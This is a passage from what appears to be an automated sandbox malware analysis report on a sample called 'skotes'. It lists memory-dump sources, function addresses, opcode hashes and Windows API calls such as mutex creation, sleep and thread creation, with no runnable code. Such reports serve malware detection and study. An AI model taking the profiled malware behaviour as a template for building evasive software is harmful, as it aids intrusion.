                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 396266464-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 89638d7c6f4c63a12648537905001a8ccc24b212a211499cc9c892748c12ab39
                                                                                                                                                                                                                                          • Instruction ID: 380b16e1574b469cbff575cdf6d83e314777c83fea80978621c376959426afb6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89638d7c6f4c63a12648537905001a8ccc24b212a211499cc9c892748c12ab39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A311571B002008BEF08EBBCD88DB6DB7ABEB85314F24461CE014DBBD6C73589818796
                                                                                                                                                                                                                                          Function 0069A682 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 0069A685
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 396266464-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 6d894d88bd49ae66491ad477db99e3fc0cc791bb723fa83de25a76bd0d495ee9
                                                                                                                                                                                                                                          • Instruction ID: e9ad77eca79aadea1371c198581988f6d896094ec8deb61ee05a7dbaf168dc87
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d894d88bd49ae66491ad477db99e3fc0cc791bb723fa83de25a76bd0d495ee9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73311531A102009BEF089BBCDD89B6DB7FBEB85310F244658E0149BBD5C77589808696
                                                                                                                                                                                                                                          Function 0069A7B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 0069A7BA
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 396266464-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 7553468de5bf7e76a137e64e22dbd06e9b844e064e3f12514ede982e34405cba
                                                                                                                                                                                                                                          • Instruction ID: 62d50e287bf7dfb6b11c4e05e7be5de53398e0d91706db0e35226216bc36daad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7553468de5bf7e76a137e64e22dbd06e9b844e064e3f12514ede982e34405cba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65310931B502048BEF08DBBCDE8DBADB7ABAB85310F24465CE0149BBD5D73549818796
                                                                                                                                                                                                                                          Function 0069A960 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 1464230837-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 0196600cb1ab63da512e337035965f4faf32cd213bd1b5c41af7a5744f935506
                                                                                                                                                                                                                                          • Instruction ID: a2df15858e05555c91f39cd65ebb32d8c6ecf978edec53957b1efc15333fb4db
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0196600cb1ab63da512e337035965f4faf32cd213bd1b5c41af7a5744f935506
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73E08620BA931096EF5076ACA88DF7A629B97D9710F211A18A608D66D5C750465082A7
                                                                                                                                                                                                                                          Function 00697590 Relevance: 4.7, APIs: 3, Instructions: 158sleepthreadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,440B685B,?,00000000,006D9138,000000FF), ref: 006975CC
                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00697430,006F8638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 006976BE
                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006976C9
                                                                                                                                                                                                                                            • Part of subcall function 006AD0C7: RtlWakeAllConditionVariable.NTDLL ref: 006AD17B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
